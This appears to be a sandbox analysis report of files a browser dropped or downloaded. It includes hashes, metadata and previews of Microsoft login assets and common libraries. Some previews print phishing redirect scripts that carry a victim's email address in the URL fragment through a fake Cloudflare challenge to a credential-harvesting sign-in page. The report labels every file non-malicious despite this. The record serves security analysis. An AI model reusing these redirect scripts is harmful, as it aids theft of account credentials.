                                                                                                                            SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                            SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                            SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                            Malicious:false
                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 99 x 98, 8-bit/color RGB, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):61
                                                                                                                            Entropy (8bit):4.068159130770306
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:yionv//thPlO/0gO6yxl/k4E08up:6v/lhPfr7Tp
                                                                                                                            MD5:69DECBFC309E4853CC1394DF0268A1A5
                                                                                                                            SHA1:74D0AB783ADF5E8E46BB7597CADCACD4CDCA3369
                                                                                                                            SHA-256:A5BFE2B1E7456176BB2C826EE37403B01F0A83AAEB933ECD7F5A38476C116E32
                                                                                                                            SHA-512:97057E01EF982A0EA754B218A25AD25077DEA778D6329667C41C5647B68B1EDF74A265F4B4B69A2419F273D63A8B018F11DE23FE22E26483FB6EDCE33FB9197D
                                                                                                                            Malicious:false
                                                                                                                            Preview:.PNG........IHDR...c...b........g....IDAT.....$.....IEND.B`.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):276
                                                                                                                            Entropy (8bit):7.316609873335077
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                                                                                            MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                                                                                            SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                                                                                            SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                                                                                            SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                                                                                            Malicious:false
                                                                                                                            Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):89501
                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                            Malicious:false
                                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js
                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):47992
                                                                                                                            Entropy (8bit):5.605846858683577
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                            MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                            SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                            SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                            SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                            Malicious:false
                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3651
                                                                                                                            Entropy (8bit):4.094801914706141
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                                                                            MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                                                            SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                                                            SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                                                            SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                                                            Malicious:false
                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:JSON data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):31
                                                                                                                            Entropy (8bit):3.86469832616696
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:YBAvZNQaY:YwZNQaY
                                                                                                                            MD5:2D7D30EA1C6F925302D2C3ABED382951
                                                                                                                            SHA1:5BA6BBC5670C4AF1125CF9AC0AA1CA2811E744D1
                                                                                                                            SHA-256:83C09BA9A8DAEDB136F90B17A294CAA90AD471A016E430DF6E229ACB5A81E100
                                                                                                                            SHA-512:BCC7AAA8A6A27ADCBD1B3E0FCA73FC1BD727FECEAB34734E99863503D1D50936A8830C0A12D75D187614F318F46B1E67F046E89F5EB6CE727D8433A722E2C525
                                                                                                                            Malicious:false
                                                                                                                            Preview:{"detail":"Method Not Allowed"}
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):61
                                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                            Malicious:false
                                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 110554
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):19953
                                                                                                                            Entropy (8bit):7.979493872046846
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:skPgmQFfKoKTQEdvXNfur7Yx01oYmMdh4KAeIjxo:vyFccEdvZzS95h4dc
                                                                                                                            MD5:C60D83111FACE767A068BE9B5178B887
                                                                                                                            SHA1:BDBE2ED3247BB647CB318A9D0A4182E65B66473D
                                                                                                                            SHA-256:62F6067588E8E74833692A1511AC8AF5B66F380E8BFC842B7EC7B2785494AEC3
                                                                                                                            SHA-512:C5C424AA2AA7AB782C294512CB3666E2AB67FC152F46576531733DAD7EE4FB4CB19BCB763C126C42DD131BF7642A103ABDF0C784BA1A0D62175F400A6D9922D7
                                                                                                                            Malicious:false
                                                                                                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css
                                                                                                                            Preview:...........}k..6..w...\..J.H=GSq..x.9...}T.....)Q..f<.3..... ..d..V..[D7.@w.....w..!x^.n..j].O.....EYT.&..(.:+.a.,...T.eZ..u...o....?<.w._.........>..x.c..|.#x......Ag*..}\gU...4 .^&U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.L..&xB...]R....0.Hp...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=.....T+V./.b.....\....7L8...=i4.Sl...TB...5...Ep[.E.u{..U@...X94].#UX..uh4.i.."....ROH... T.mpU&[.rY..\rU..&..=..e.....T.....U].viNe..dU.>z..wGh]...o...eQ.U]&.~.TU.d.......j...+.?O...G...N.x....7YMd.....G....dUE.C.0#.T|..%O....:)....o...viY.qY'..6a...`2!P!.P...F.],...iY,.T6L.....Pm8. r...B.i.?.LS$( .^.{..u.-.0I...KZ...M&J...<"D..i..g/...lE.MY.v.K.y.`.Q...$V4.1.G....*..G.BF{..]...../XT......%Y.h./....Y..e.DjIh.E_.9...i.b..h..9.trY\.>#B...R..jM..e*.F...h.lNI..j"xj..c...$............g._....w.......?.'.>..^../...1 ..!...go......{....{......G....xA...<....o~.~ ....^]..&D?..h..........$..~.xu....G...........36.\<........{...).GB.....'..x.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:HTML document, ASCII text, with very long lines (1174)
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):3546
                                                                                                                            Entropy (8bit):5.794519651442814
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:EYi6ss/RO6/6Ll6q6nS2SmSjS6SzcG9EMWfwDz:EYi6C6/656q6vSpjSRzcG5WfwDz
                                                                                                                            MD5:9A1008AC2E6DFD51287024EB6F634E60
                                                                                                                            SHA1:39D0AFAACF0D65B345F1879D5811E77BDF8CA147
                                                                                                                            SHA-256:EF74A3D4E53AD052A99AE3F28DF6B77C1871953E3804001F33240189AD048B30
                                                                                                                            SHA-512:581130382B36FD32DF0EC76FA7C07B4F372042DFC66BED86F31580781BC0B345BC9C7B78651DD659358DF05C42ABA0E3B9EEBC7968471FAF4780B528ADB1E6BA
                                                                                                                            Malicious:false
                                                                                                                            URL:https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/
                                                                                                                            Preview:<html>.<head>.<meta name="viewport" content="width=device-width, initial-scale=1.0"><script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script><style>.#nacreous { animation: bounce 5s infinite; }.@keyframes bounce {59% { transform: translateY(3px) scaleY(0.97); }93% { transform: translateY(-6px) scaleY(1.07); }89% { transform: translateY(8px) scaleY(0.98); }86% { transform: translateY(10px) scaleY(0.98); }77% { transform: translateY(8px) scaleY(0.93); }84% { transform: translateY(0px) scaleY(1.01); }}.#backfire { animation: bounce 5s infinite; }.@keyframes bounce {75% { transform: translateY(-5px) scaleY(1.03); }34% { transform: translateY(-14px) scaleY(0.94); }93% { transform: translateY(19px) scaleY(1.04); }9% { transform: translateY(-11px) scaleY(1.04); }20% { transform: translateY(6px) scaleY(1.1); }}.#cachet { animation: bounce 5s infinite; }.@keyframes bounce {63% { transform: translateY(-13px) scaleY(0.9); }27% { transform: translateY(0px) sca
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1864
                                                                                                                            Entropy (8bit):5.222032823730197
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                            MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                            SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                            SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                            SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                            Malicious:false
                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):232
                                                                                                                            Entropy (8bit):5.018646346622338
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Ha2pvHF/KRLhlC2/oxmmav2cAqR2RZZWdNdb:Ha2pvHF/KRLhlC2/oxxaej3ZEFb
                                                                                                                            MD5:435F2803C0A0CF4E5AD82D65EA0301C7
                                                                                                                            SHA1:84A5D5F6BE2A0B7C6E7E5E03CC2F318C01DFC651
                                                                                                                            SHA-256:633BEA0113FE81393982AC536892BF88F1C003262AD95D5E9990EA1B4982879F
                                                                                                                            SHA-512:14942F4419DE8B12891618D47FC29D839A50F41B185B5E16434A4111BAB8074A1D6A9EE9FAD4F185EAC7E3B0AA423241B046A7852897FB23B8738FFCA4822F23
                                                                                                                            Malicious:false
                                                                                                                            URL:https://timesofvartha.com/cloudflare-challenge/
                                                                                                                            Preview:<script>. var fragment = window.location.hash.substring(1);. fragment = fragment.replace(/\+/g, '@');. window.location.href = 'https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#' + fragment;. </script>
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):61
                                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                            Malicious:false
                                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:JSON data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):31
                                                                                                                            Entropy (8bit):3.86469832616696
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:YBAvZNQaY:YwZNQaY
                                                                                                                            MD5:2D7D30EA1C6F925302D2C3ABED382951
                                                                                                                            SHA1:5BA6BBC5670C4AF1125CF9AC0AA1CA2811E744D1
                                                                                                                            SHA-256:83C09BA9A8DAEDB136F90B17A294CAA90AD471A016E430DF6E229ACB5A81E100
                                                                                                                            SHA-512:BCC7AAA8A6A27ADCBD1B3E0FCA73FC1BD727FECEAB34734E99863503D1D50936A8830C0A12D75D187614F318F46B1E67F046E89F5EB6CE727D8433A722E2C525
                                                                                                                            Malicious:false
                                                                                                                            Preview:{"detail":"Method Not Allowed"}
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):248
                                                                                                                            Entropy (8bit):4.788179668828822
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:XreAVv2vKEDFYa2pvulC2/QmmhCBKCWdNYMmYL:7eAVeSEZYa2pvulC2/Qxkq71L
                                                                                                                            MD5:93B0E943659E54E593A0617FDB367185
                                                                                                                            SHA1:5068CCA2BDD07129F87125EAE16C1B16C4462C95
                                                                                                                            SHA-256:5967E029650E7FB6FE5EEFBAEB6ED870DFE10460931A0EB660B8F89A1F9A3381
                                                                                                                            SHA-512:7C5ED1798EDF5DAF0E4A7F734A12ED3EB89FC80612A954A5E93C1B416554D7632229C91179B84D831AD67E701A709584ADA2F8E3F1FC7575E07064022F791332
                                                                                                                            Malicious:false
                                                                                                                            URL:https://sepedatua.com/158983/secure-redirect/
                                                                                                                            Preview:<script>. (function() {. var mylink = 'https://timesofvartha.com/cloudflare-challenge/#';. var fragment = window.location.hash.substring(1).replace(/\+/g, '@');. window.location.href = mylink + fragment;. })();.</script>.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):47992
                                                                                                                            Entropy (8bit):5.605846858683577
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                            MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                            SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                            SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                            SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                            Malicious:false
                                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):583
                                                                                                                            Entropy (8bit):5.11550204447751
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:vQ0AMyHWBFc+sc3Ea2KVdNxtNufiCRiTkJsU3++W6OQ4NbxBShQL:vQFrWMAEafVfN+iCR2kJe+P4NjSK
                                                                                                                            MD5:59F6AE7C7F154EC74D418D4ED6FC5B0E
                                                                                                                            SHA1:674860108A41AB23BA5F73635749332BD8A46B7E
                                                                                                                            SHA-256:50E0767F2731DA7DDB56D719DC85A7F830C4A860D8F09D0F25401D3DC7097D7D
                                                                                                                            SHA-512:501F35D5347BD1F20024A1C76172874E0026289F6DD60DE6A1F83EF2DEB0FFF07CD75C45B4DCF693A7C2FF903528BEDBD05C2B9F9BB439D294F5F904427173F7
                                                                                                                            Malicious:false
                                                                                                                            URL:https://timesofvartha.com/favicon.ico
                                                                                                                            Preview:<html>.<head>. <style>. .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; }. @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }. </style>. <script language="Javascript">var _skz_pid = "9PO5645V6";</script>. <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script>.</head>.<body>.<div class="loader" id="sk-loader"></div>.</body>.</html>.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):3651
                                                                                                                            Entropy (8bit):4.094801914706141
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                                                                            MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                                                            SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                                                            SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                                                            SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                                                            Malicious:false
                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg
                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                                                            File type:data
